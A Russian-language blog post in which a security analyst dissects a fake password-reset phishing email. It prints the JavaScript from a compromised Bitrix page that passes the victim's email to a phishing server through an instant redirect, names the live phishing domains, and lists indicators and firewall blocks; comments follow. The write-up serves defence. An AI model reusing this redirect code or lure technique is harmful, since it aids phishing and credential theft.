Всем привет! Хочу поделиться, возможно, не новым, но, на мой взгляд, довольно изощренным видом фишинга. Кто-то уже наверняка сталкивался с таким методом, а для кого-то он окажется в новинку.
ПРЕДУПРЕЖДЕНИЕ: Материалы данной статьи носят исключительно ознакомительный характер и публикуются в образовательных целях. Фишинг, равно как и любые разновидности социальной инженерии, направленные на получение НСД или нарушение целостности, доступности и конфиденциальности информации, являются уголовно наказуемыми деяниями. Информация предназначена для специалистов Blue Team в интересах противодействия интернет-мошенничеству.
Письмо
Открываю рабочую почту и вижу обратную связь от пользователя, в которой он предупреждает о попытке скама.
Обычная рядовая ситуация: юзера пытаются соскамить на письмо из техподдержки, но он сразу раскусил обман и перенаправил письмо в Отдел ИБ.
Вложение
Открываю сохраненное письмо. Вижу классическую попытку обмана, рассчитанную на невнимательность - сброс пароля от учетной записи. Письмо отправлено с домена "etrh.ru" (зарегистрирован в РУ-сегменте, но об этом далее).
Казалось бы, обычный немного топорный скам, с которым сталкиваешься ежедневно. Видно, что мошенники особо не готовились, скорее всего запустили в массы с помощью скрипта-рассыльщика.
Навожу курсор на гиперссылку и вижу адрес: https://zil-dom[.]ru/bitrix/admin/rrc/cvvc[.]html
Изучение ссылки
Проверяю ссылку с помощью curl, чтобы найти артефакты (стандартная процедура в таких ситуациях). И что же мы видим?
curl -s https://zil-dom.ru/bitrix/admin/rrc/cvvc.html
А видим мы ловкий трюк с использованием Java-скрипта, который автоматически редиректит нас на совершенно другой веб-ресурс.
https://threestarcrm.com/7yy/index.php?userid={victim_email}
Механизм атаки выглядит следующим образом: код на странице cvvc.html извлекает email жертвы из хэша URL и мгновенно (через 1 мс) перенаправляет браузер на основной фишинговый сервер:
var hash = window.location.hash; var em = hash.split('#')[1]; window.setTimeout(function() { window.location.href = 'https://threestarcrm.com/7yy/index.php?userid=' + em; }, 1);
ANY.RUN - REPORT
Прогоняю фишинговую ссылку через песочницу и получаю вполне очевидный результат - malicious activity
Индикаторы компрометации (IOC)
В таблице ниже — обнаруженные в ходе короткого расследования индикаторы. Считаю своим долгом предупредить коллег из Blue Team.
Тип |
Значение |
Описание |
|---|---|---|
Домен |
Скомпрометированный сайт-редиректор |
|
Домен |
Фишинговый сайт (основной) |
|
IP |
|
Актуальный IP фишингового сервера |
IP-сеть |
|
Сеть хостинг-провайдера (рекомендована к блокировке) |
URL |
Путь к вредоносному файлу |
|
URL |
|
Путь к фишинговой форме |
Целевой email в тестовом образце |
||
WHOIS |
Creation Date: 02.04.2019 |
Домену 7+ лет (не «однодневка») |
Регистратор |
PDR Ltd. (PublicDomainRegistry.com) |
Индийский регистратор |
Принятые меры
На NGFW и антивирусе добавлены в черный список:
FQDN-объект:
threestarcrm.com— блокировка по доменному имениSubnet-объект:
Fishing_69.49.232.0/22— блокировка всей подсети хостинг-провайдера (69.49.232.0–69.49.235.255)-
FQDN-объект:
zil-dom.ru— блокировка скомпрометированного редиректора2. Направлено обращение хостерам с приложением пруфов. Обратной связи пока не получил (что немного огорчает)
Резюме (коротко)
Вряд ли я открыл какую-то тайну. Домены "zil-dom.ru" и "etrh.ru", вероятно, скомпрометированы. Оба зарегистрированы на PRIVATE PERSON. Домен "treestarcrm.com" живет в Интернете около 7 лет, но блокировать его, по-видимому, никто не спешит. Методика фишинга достаточно хитрая, потому что все браузеры по умолчанию выполняют Java-срипты.
Основная опасность - это подмена содержания гиперссылки. При грамотной разведке цели мошенники могли бы вставить туда любой легитимный адрес компании и без труда обманули бы жертву, которая попыталась бы проверить ссылку, наведя на нее курсор (о чем обычно просят всех юзеров, перед тем, как кликнуть по ней). Такие вот дела.
Надеюсь, что статья была полезна. Всем добра! :-)
Комментарии (4)
BugM
16.05.2026 05:25Все равно не понятно. Ну редирект. И что?
С виду обычный фишинг. Такого море.
Mr_Hartman Автор
16.05.2026 05:25Видимо, не совсем корректно выразил мысль. Постараюсь уточнить: в письме гиперссылка на абсолютно типичный российский сайт с CMS Bitrix. У Битрикс есть уязвимость, которую сами Битриксы таковой не считают — open redirect
Смысл прост: в гиперссылку помещается ссылка на обычный российский сайт. Жертва наводит курсор и видит обычный российский сайт. Кликакт по ней, но попадает на домен в Индии с помощью Java-скрипта. Если бы хакер уделил больше внимания разведке, в гиперссылке мог бы оказаться любой госовский или около госовский портал (именно его бы увиделп жертва, если бы навела курсор на ссылку)
BugM
16.05.2026 05:25И я все равно не понимаю. Редиректы это нормально для интернета. Любой сайт может вас редиректнуть на любой другой сайт. На этом построен вполне легальный синк кук.
Открытый редирект это действительно не уязвимость для большинства сайтов. Странички на том же Гугле "Осторожно вы покидаете Гугл!" бесят. Да я блин только что на ссылку кликнул.
Открытый редирект проблема только для доверенных сайтов. Где люди без проблем вводят свою кредитку, например. Там да. Можно сделать похожий фишинговый сайт и заманив человека на свой урл на легальном сайте и украсть кредитку. Битрис из таких или нет я не уверен. Битрикс это вообще платформа довольно большая. О чем вы непонятно.
Wesha
Отучаемся говорит за всю сеть.
lynxне выполняет!А в чём трюк-то? В перенаправлении? Так это можно сотней способов осуществить — но результат-то один!